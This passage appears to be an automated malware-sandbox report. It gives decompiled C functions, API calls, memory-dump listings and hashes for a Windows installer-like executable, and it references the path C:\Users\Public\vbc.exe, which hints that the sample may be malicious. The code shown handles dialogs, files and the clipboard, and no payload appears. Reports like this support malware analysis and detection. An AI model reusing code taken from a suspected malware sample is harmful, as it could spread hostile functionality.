                                          • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                          • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                                          • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                          • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E00401389(signed int _a4) {
                                          				intOrPtr* _t6;
                                          				void* _t8;
                                          				void* _t10;
                                          				signed int _t11;
                                          				void* _t12;
                                          				intOrPtr _t15;
                                          				signed int _t16;
                                          				signed int _t17;
                                          				void* _t18;
                                          
                                          				_t17 = _a4;
                                          				while(_t17 >= 0) {
                                          					_t15 =  *0x42eb90; // 0x290984
                                          					_t6 = _t17 * 0x1c + _t15;
                                          					if( *_t6 == 1) {
                                          						break;
                                          					}
                                          					_push(_t6); // executed
                                          					_t8 = E00401434(); // executed
                                          					if(_t8 == 0x7fffffff) {
                                          						return 0x7fffffff;
                                          					}
                                          					_t10 = E0040136D(_t8);
                                          					if(_t10 != 0) {
                                          						_t11 = _t10 - 1;
                                          						_t16 = _t17;
                                          						_t17 = _t11;
                                          						_t12 = _t11 - _t16;
                                          					} else {
                                          						_t12 = _t10 + 1;
                                          						_t17 = _t17 + 1;
                                          					}
                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                          						 *0x42e34c =  *0x42e34c + _t12;
                                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
                                          					}
                                          				}
                                          				return 0;
                                          			}













                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                          • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                                          • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                          • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E00405602(CHAR* _a4, long _a8, long _a12) {
                                          				signed int _t5;
                                          				void* _t6;
                                          
                                          				_t5 = GetFileAttributesA(_a4); // executed
                                          				asm("sbb ecx, ecx");
                                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                          				return _t6;
                                          			}






                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000003,00402C4B,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405606
                                          • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                          • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                          • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                          • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004055E3(CHAR* _a4) {
                                          				signed char _t3;
                                          
                                          				_t3 = GetFileAttributesA(_a4); // executed
                                          				if(_t3 != 0xffffffff) {
                                          					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                          				}
                                          				return _t3;
                                          			}





                                          APIs
                                          • GetFileAttributesA.KERNEL32(?,004053EE,?,?,?), ref: 004055E7
                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                          • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                                          • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                          • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403066(void* _a4, long _a8) {
                                          				int _t6;
                                          				long _t10;
                                          
                                          				_t10 = _a8;
                                          				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                                          				if(_t6 == 0 || _a8 != _t10) {
                                          					return 0;
                                          				} else {
                                          					return 1;
                                          				}
                                          			}






                                          APIs
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 0040307D
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                          • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                                          • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                          • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403098(long _a4) {
                                          				long _t2;
                                          
                                          				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                                          				return _t2;
                                          			}





                                          APIs
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00402DD2,000319E4), ref: 004030A6
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                          • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                          • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                          • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 98%
                                          			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                          				struct HWND__* _v8;
                                          				struct HWND__* _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				void* _v24;
                                          				long _v28;
                                          				int _v32;
                                          				signed int _v40;
                                          				int _v44;
                                          				signed int* _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				long _v68;
                                          				void* _v72;
                                          				intOrPtr _v76;
                                          				intOrPtr _v80;
                                          				void* _v84;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				struct HWND__* _t182;
                                          				intOrPtr _t183;
                                          				int _t189;
                                          				int _t196;
                                          				intOrPtr _t198;
                                          				long _t202;
                                          				signed int _t206;
                                          				signed int _t217;
                                          				void* _t220;
                                          				void* _t221;
                                          				int _t227;
                                          				intOrPtr _t231;
                                          				signed int _t232;
                                          				signed int _t233;
                                          				signed int _t240;
                                          				signed int _t242;
                                          				signed int _t245;
                                          				signed int _t247;
                                          				struct HBITMAP__* _t250;
                                          				void* _t252;
                                          				char* _t268;
                                          				signed char _t269;
                                          				long _t274;
                                          				int _t280;
                                          				signed int* _t281;
                                          				int _t282;
                                          				long _t283;
                                          				signed int* _t284;
                                          				int _t285;
                                          				long _t286;
                                          				signed int _t287;
                                          				long _t288;
                                          				signed int _t291;
                                          				int _t294;
                                          				signed int _t298;
                                          				signed int _t300;
                                          				signed int _t302;
                                          				intOrPtr _t309;
                                          				int* _t310;
                                          				void* _t311;
                                          				int _t315;
                                          				int _t316;
                                          				int _t317;
                                          				signed int _t318;
                                          				void* _t320;
                                          				void* _t328;
                                          				void* _t331;
                                          
                                          				_v12 = GetDlgItem(_a4, 0x3f9);
                                          				_t182 = GetDlgItem(_a4, 0x408);
                                          				_t280 =  *0x42eb88; // 0x29056c
                                          				_t320 = SendMessageA;
                                          				_v8 = _t182;
                                          				_t183 =  *0x42eb70; // 0x2903c0
                                          				_t315 = 0;
                                          				_v32 = _t280;
                                          				_v20 = _t183 + 0x94;
                                          				if(_a8 != 0x110) {
                                          					L23:
                                          					__eflags = _a8 - 0x405;
                                          					if(_a8 != 0x405) {
                                          						_t289 = _a16;
                                          					} else {
                                          						_a12 = _t315;
                                          						_t289 = 1;
                                          						_a8 = 0x40f;
                                          						_a16 = 1;
                                          					}
                                          					__eflags = _a8 - 0x4e;
                                          					if(_a8 == 0x4e) {
                                          						L28:
                                          						__eflags = _a8 - 0x413;
                                          						_v16 = _t289;
                                          						if(_a8 == 0x413) {
                                          							L30:
                                          							__eflags =  *0x42eb79 & 0x00000002;
                                          							if(( *0x42eb79 & 0x00000002) != 0) {
                                          								L41:
                                          								__eflags = _v16 - _t315;
                                          								if(_v16 != _t315) {
                                          									_t232 = _v16;
                                          									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                          									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                          										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                          									}
                                          									_t233 = _v16;
                                          									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                          									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                          										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                          										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                          											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                          											 *_t284 =  *_t284 & 0xffffffdf;
                                          											__eflags =  *_t284;
                                          										} else {
                                          											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                          										}
                                          									}
                                          								}
                                          								goto L48;
                                          							}
                                          							__eflags = _a8 - 0x413;
                                          							if(_a8 == 0x413) {
                                          								L33:
                                          								__eflags = _a8 - 0x413;
                                          								_t289 = 0 | _a8 != 0x00000413;
                                          								_t240 = E00404598(_v8, _a8 != 0x413);
                                          								__eflags = _t240 - _t315;
                                          								if(_t240 >= _t315) {
                                          									_t93 = _t280 + 8; // 0x8
                                          									_t310 = _t240 * 0x418 + _t93;
                                          									_t289 =  *_t310;
                                          									__eflags = _t289 & 0x00000010;
                                          									if((_t289 & 0x00000010) == 0) {
                                          										__eflags = _t289 & 0x00000040;
                                          										if((_t289 & 0x00000040) == 0) {
                                          											_t298 = _t289 ^ 0x00000001;
                                          											__eflags = _t298;
                                          										} else {
                                          											_t300 = _t289 ^ 0x00000080;
                                          											__eflags = _t300;
                                          											if(_t300 >= 0) {
                                          												_t298 = _t300 & 0xfffffffe;
                                          											} else {
                                          												_t298 = _t300 | 0x00000001;
                                          											}
                                          										}
                                          										 *_t310 = _t298;
                                          										E0040117D(_t240);
                                          										_t242 =  *0x42eb78; // 0x80
                                          										_t289 = 1;
                                          										_a8 = 0x40f;
                                          										_t245 =  !_t242 >> 0x00000008 & 1;
                                          										__eflags = _t245;
                                          										_a12 = 1;
                                          										_a16 = _t245;
                                          									}
                                          								}
                                          								goto L41;
                                          							}
                                          							_t289 = _a16;
                                          							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                          							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                          								goto L41;
                                          							}
                                          							goto L33;
                                          						}
                                          						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                          						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                          							goto L48;
                                          						}
                                          						goto L30;
                                          					} else {
                                          						__eflags = _a8 - 0x413;
                                          						if(_a8 != 0x413) {
                                          							L48:
                                          							__eflags = _a8 - 0x111;
                                          							if(_a8 != 0x111) {
                                          								L56:
                                          								__eflags = _a8 - 0x200;
                                          								if(_a8 == 0x200) {
                                          									SendMessageA(_v8, 0x200, _t315, _t315);
                                          								}
                                          								__eflags = _a8 - 0x40b;
                                          								if(_a8 == 0x40b) {
                                          									_t220 =  *0x429fb4;
                                          									__eflags = _t220 - _t315;
                                          									if(_t220 != _t315) {
                                          										ImageList_Destroy(_t220);
                                          									}
                                          									_t221 =  *0x429fcc;
                                          									__eflags = _t221 - _t315;
                                          									if(_t221 != _t315) {
                                          										GlobalFree(_t221);
                                          									}
                                          									 *0x429fb4 = _t315;
                                          									 *0x429fcc = _t315;
                                          									 *0x42ebc0 = _t315;
                                          								}
                                          								__eflags = _a8 - 0x40f;
                                          								if(_a8 != 0x40f) {
                                          									L86:
                                          									__eflags = _a8 - 0x420;
                                          									if(_a8 == 0x420) {
                                          										__eflags =  *0x42eb79 & 0x00000001;
                                          										if(( *0x42eb79 & 0x00000001) != 0) {
                                          											__eflags = _a16 - 0x20;
                                          											_t189 = (0 | _a16 == 0x00000020) << 3;
                                          											__eflags = _t189;
                                          											_t316 = _t189;
                                          											ShowWindow(_v8, _t316);
                                          											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                          										}
                                          									}
                                          									goto L89;
                                          								} else {
                                          									E004011EF(_t289, _t315, _t315);
                                          									__eflags = _a12 - _t315;
                                          									if(_a12 != _t315) {
                                          										E0040140B(8);
                                          									}
                                          									__eflags = _a16 - _t315;
                                          									if(_a16 == _t315) {
                                          										L73:
                                          										E004011EF(_t289, _t315, _t315);
                                          										__eflags =  *0x42eb8c - _t315; // 0x1
                                          										_v32 =  *0x429fcc;
                                          										_t196 =  *0x42eb88; // 0x29056c
                                          										_v60 = 0xf030;
                                          										_v16 = _t315;
                                          										if(__eflags <= 0) {
                                          											L84:
                                          											InvalidateRect(_v8, _t315, 1);
                                          											_t198 =  *0x42e33c; // 0x294de4
                                          											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                          											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                          												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
                                          											}
                                          											goto L86;
                                          										} else {
                                          											_t142 = _t196 + 8; // 0x290574
                                          											_t281 = _t142;
                                          											do {
                                          												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                          												__eflags = _t202 - _t315;
                                          												if(_t202 != _t315) {
                                          													_t291 =  *_t281;
                                          													_v68 = _t202;
                                          													__eflags = _t291 & 0x00000001;
                                          													_v72 = 8;
                                          													if((_t291 & 0x00000001) != 0) {
                                          														_t151 =  &(_t281[4]); // 0x290584
                                          														_v72 = 9;
                                          														_v56 = _t151;
                                          														_t154 =  &(_t281[0]);
                                          														 *_t154 = _t281[0] & 0x000000fe;
                                          														__eflags =  *_t154;
                                          													}
                                          													__eflags = _t291 & 0x00000040;
                                          													if((_t291 & 0x00000040) == 0) {
                                          														_t206 = (_t291 & 0x00000001) + 1;
                                          														__eflags = _t291 & 0x00000010;
                                          														if((_t291 & 0x00000010) != 0) {
                                          															_t206 = _t206 + 3;
                                          															__eflags = _t206;
                                          														}
                                          													} else {
                                          														_t206 = 3;
                                          													}
                                          													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                          													__eflags = _t294;
                                          													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                          													SendMessageA(_v8, 0x1102, _t294, _v68);
                                          													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                          												}
                                          												_v16 = _v16 + 1;
                                          												_t281 =  &(_t281[0x106]);
                                          												__eflags = _v16 -  *0x42eb8c; // 0x1
                                          											} while (__eflags < 0);
                                          											goto L84;
                                          										}
                                          									} else {
                                          										_t282 = E004012E2( *0x429fcc);
                                          										E00401299(_t282);
                                          										_t217 = 0;
                                          										_t289 = 0;
                                          										__eflags = _t282 - _t315;
                                          										if(_t282 <= _t315) {
                                          											L72:
                                          											SendMessageA(_v12, 0x14e, _t289, _t315);
                                          											_a16 = _t282;
                                          											_a8 = 0x420;
                                          											goto L73;
                                          										} else {
                                          											goto L69;
                                          										}
                                          										do {
                                          											L69:
                                          											_t309 = _v20;
                                          											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                          											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                          												_t289 = _t289 + 1;
                                          												__eflags = _t289;
                                          											}
                                          											_t217 = _t217 + 1;
                                          											__eflags = _t217 - _t282;
                                          										} while (_t217 < _t282);
                                          										goto L72;
                                          									}
                                          								}
                                          							}
                                          							__eflags = _a12 - 0x3f9;
                                          							if(_a12 != 0x3f9) {
                                          								goto L89;
                                          							}
                                          							__eflags = _a12 >> 0x10 - 1;
                                          							if(_a12 >> 0x10 != 1) {
                                          								goto L89;
                                          							}
                                          							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                          							__eflags = _t227 - 0xffffffff;
                                          							if(_t227 == 0xffffffff) {
                                          								goto L89;
                                          							}
                                          							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                          							__eflags = _t283 - 0xffffffff;
                                          							if(_t283 == 0xffffffff) {
                                          								L54:
                                          								_t283 = 0x20;
                                          								L55:
                                          								E00401299(_t283);
                                          								SendMessageA(_a4, 0x420, _t315, _t283);
                                          								_a12 = 1;
                                          								_a16 = _t315;
                                          								_a8 = 0x40f;
                                          								goto L56;
                                          							}
                                          							_t231 = _v20;
                                          							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                          							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                          								goto L55;
                                          							}
                                          							goto L54;
                                          						}
                                          						goto L28;
                                          					}
                                          				} else {
                                          					 *0x42ebc0 = _a4;
                                          					_t247 =  *0x42eb8c; // 0x1
                                          					_t285 = 2;
                                          					_v28 = 0;
                                          					_v16 = _t285;
                                          					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
                                          					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
                                          					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
                                          					_v24 = _t250;
                                          					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
                                          					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                          					 *0x429fb4 = _t252;
                                          					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                          					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
                                          					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                          						SendMessageA(_v8, 0x111b, 0x10, 0);
                                          					}
                                          					DeleteObject(_v24);
                                          					_t286 = 0;
                                          					do {
                                          						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                          						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                          							if(_t286 != 0x20) {
                                          								_v16 = _t315;
                                          							}
                                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
                                          						}
                                          						_t286 = _t286 + 1;
                                          					} while (_t286 < 0x21);
                                          					_t317 = _a16;
                                          					_t287 = _v16;
                                          					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                          					_push(0x15);
                                          					E00403CDD(_a4);
                                          					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                          					_push(0x16);
                                          					E00403CDD(_a4);
                                          					_t318 = 0;
                                          					_t288 = 0;
                                          					_t328 =  *0x42eb8c - _t318; // 0x1
                                          					if(_t328 <= 0) {
                                          						L19:
                                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                          						goto L20;
                                          					} else {
                                          						_t311 = _v32 + 8;
                                          						_v24 = _t311;
                                          						do {
                                          							_t268 = _t311 + 0x10;
                                          							if( *_t268 != 0) {
                                          								_v60 = _t268;
                                          								_t269 =  *_t311;
                                          								_t302 = 0x20;
                                          								_v84 = _t288;
                                          								_v80 = 0xffff0002;
                                          								_v76 = 0xd;
                                          								_v64 = _t302;
                                          								_v40 = _t318;
                                          								_v68 = _t269 & _t302;
                                          								if((_t269 & 0x00000002) == 0) {
                                          									__eflags = _t269 & 0x00000004;
                                          									if((_t269 & 0x00000004) == 0) {
                                          										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                          									} else {
                                          										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                          									}
                                          								} else {
                                          									_v76 = 0x4d;
                                          									_v44 = 1;
                                          									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                          									_v28 = 1;
                                          									 *( *0x429fcc + _t318 * 4) = _t274;
                                          									_t288 =  *( *0x429fcc + _t318 * 4);
                                          								}
                                          							}
                                          							_t318 = _t318 + 1;
                                          							_t311 = _v24 + 0x418;
                                          							_t331 = _t318 -  *0x42eb8c; // 0x1
                                          							_v24 = _t311;
                                          						} while (_t331 < 0);
                                          						if(_v28 != 0) {
                                          							L20:
                                          							if(_v16 != 0) {
                                          								E00403D12(_v8);
                                          								_t280 = _v32;
                                          								_t315 = 0;
                                          								__eflags = 0;
                                          								goto L23;
                                          							} else {
                                          								ShowWindow(_v12, 5);
                                          								E00403D12(_v12);
                                          								L89:
                                          								return E00403D44(_a8, _a12, _a16);
                                          							}
                                          						}
                                          						goto L19;
                                          					}
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N$M)
                                          • API String ID: 1638840714-1412667084
                                          • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                          • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                                          • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                          • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                          				struct HWND__* _v8;
                                          				long _v12;
                                          				struct tagRECT _v28;
                                          				void* _v36;
                                          				signed int _v40;
                                          				int _v44;
                                          				int _v48;
                                          				signed int _v52;
                                          				int _v56;
                                          				void* _v60;
                                          				void* _v68;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				long _t87;
                                          				unsigned int _t92;
                                          				unsigned int _t93;
                                          				int _t94;
                                          				int _t95;
                                          				long _t98;
                                          				void* _t101;
                                          				intOrPtr _t123;
                                          				struct HWND__* _t127;
                                          				int _t149;
                                          				int _t150;
                                          				struct HWND__* _t154;
                                          				struct HWND__* _t158;
                                          				struct HMENU__* _t160;
                                          				long _t162;
                                          				void* _t163;
                                          				short* _t164;
                                          
                                          				_t154 =  *0x42e344; // 0x0
                                          				_t149 = 0;
                                          				_v8 = _t154;
                                          				if(_a8 != 0x110) {
                                          					__eflags = _a8 - 0x405;
                                          					if(_a8 == 0x405) {
                                          						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                          					}
                                          					__eflags = _a8 - 0x111;
                                          					if(_a8 != 0x111) {
                                          						L17:
                                          						__eflags = _a8 - 0x404;
                                          						if(_a8 != 0x404) {
                                          							L25:
                                          							__eflags = _a8 - 0x7b;
                                          							if(_a8 != 0x7b) {
                                          								goto L20;
                                          							}
                                          							__eflags = _a12 - _t154;
                                          							if(_a12 != _t154) {
                                          								goto L20;
                                          							}
                                          							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                          							__eflags = _t87 - _t149;
                                          							_a8 = _t87;
                                          							if(_t87 <= _t149) {
                                          								L37:
                                          								return 0;
                                          							}
                                          							_t160 = CreatePopupMenu();
                                          							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
                                          							_t92 = _a16;
                                          							__eflags = _t92 - 0xffffffff;
                                          							if(_t92 != 0xffffffff) {
                                          								_t150 = _t92;
                                          								_t93 = _t92 >> 0x10;
                                          								__eflags = _t93;
                                          								_t94 = _t93;
                                          							} else {
                                          								GetWindowRect(_t154,  &_v28);
                                          								_t150 = _v28.left;
                                          								_t94 = _v28.top;
                                          							}
                                          							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                          							_t162 = 1;
                                          							__eflags = _t95 - 1;
                                          							if(_t95 == 1) {
                                          								_v60 = _t149;
                                          								_v48 = 0x429fd8;
                                          								_v44 = 0xfff;
                                          								_a4 = _a8;
                                          								do {
                                          									_a4 = _a4 - 1;
                                          									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                          									__eflags = _a4 - _t149;
                                          									_t162 = _t162 + _t98 + 2;
                                          								} while (_a4 != _t149);
                                          								OpenClipboard(_t149);
                                          								EmptyClipboard();
                                          								_t101 = GlobalAlloc(0x42, _t162);
                                          								_a4 = _t101;
                                          								_t163 = GlobalLock(_t101);
                                          								do {
                                          									_v48 = _t163;
                                          									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                          									 *_t164 = 0xa0d;
                                          									_t163 = _t164 + 2;
                                          									_t149 = _t149 + 1;
                                          									__eflags = _t149 - _a8;
                                          								} while (_t149 < _a8);
                                          								GlobalUnlock(_a4);
                                          								SetClipboardData(1, _a4);
                                          								CloseClipboard();
                                          							}
                                          							goto L37;
                                          						}
                                          						__eflags =  *0x42e32c - _t149; // 0x0
                                          						if(__eflags == 0) {
                                          							ShowWindow( *0x42eb68, 8);
                                          							__eflags =  *0x42ebec - _t149; // 0x0
                                          							if(__eflags == 0) {
                                          								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
                                          							}
                                          							E00403CB6(1);
                                          							goto L25;
                                          						}
                                          						 *0x4293a0 = 2;
                                          						E00403CB6(0x78);
                                          						goto L20;
                                          					} else {
                                          						__eflags = _a12 - 0x403;
                                          						if(_a12 != 0x403) {
                                          							L20:
                                          							return E00403D44(_a8, _a12, _a16);
                                          						}
                                          						ShowWindow( *0x42e330, _t149);
                                          						ShowWindow(_t154, 8);
                                          						E00403D12(_t154);
                                          						goto L17;
                                          					}
                                          				}
                                          				_v52 = _v52 | 0xffffffff;
                                          				_v40 = _v40 | 0xffffffff;
                                          				_v60 = 2;
                                          				_v56 = 0;
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t123 =  *0x42eb70; // 0x2903c0
                                          				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                          				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                          				 *0x42e330 = GetDlgItem(_a4, 0x403);
